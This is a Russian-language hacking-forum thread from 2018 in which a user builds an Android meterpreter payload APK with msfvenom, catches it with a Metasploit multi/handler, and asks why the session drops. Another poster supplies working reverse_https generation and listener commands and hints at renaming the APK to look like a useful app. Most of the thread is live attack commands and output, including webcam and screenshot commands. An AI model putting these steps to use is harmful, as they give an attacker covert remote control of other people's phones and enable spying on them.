ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   Получение meterpreter - сессии на Andriod (https://forum.antichat.xyz/showthread.php?t=562890)

vunya 02.04.2018 18:29

Добрый день !
Не могу понять по какой причине рвется сессия, открытая на андроид-смарте.

Сгенерирован пэйлоад:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -a dalvik --platform android -o /root/xiaomi/abc.apk

Его забросил на свой девайс.
Заупскаю Мультихэндлер, запускаю арк на смарте и получаю вот такое:

msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.104:4444 [*] Sending stage (70031 bytes) to 192.168.1.103[*] Sleeping before handling stage...[*] Meterpreter session 16 opened (192.168.1.104:4444 -> 192.168.1.103:47010) at 2018-04-02 17:08:57 +0300[*] 192.168.1.103 - Meterpreter session 16 closed. Reason: Died

Опции:
Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.104 yes The listen address
LPORT 4444 yes The listen port

ghostphisher 02.04.2018 22:43

reverse_https стоит попробовать

vunya 03.04.2018 10:28

благодарю
получилось получить сессию, правда какаую-то странную
ни одна команда не выполняется

meterpreter > screenshot
[-] Error running command screenshot: Rex::TimeoutError Operation timed out.
meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > ifconfig
[-] Error running command ifconfig: Rex::TimeoutError Operation timed out.
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter >

ghostphisher 03.04.2018 10:43

1) msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.104 LPORT=4444 -a dalvik --platform android -o /root/xiaomi/abc.apk
2)msf exploit(multi/handler) >
set payload android/meterpreter/reverse_https
set lport 4444
set lhost
run
3) Порт указать который ранее не использовался, если все время долбили 4444,ставим 6789 и название меняем у полезного приложения.


Время: 16:29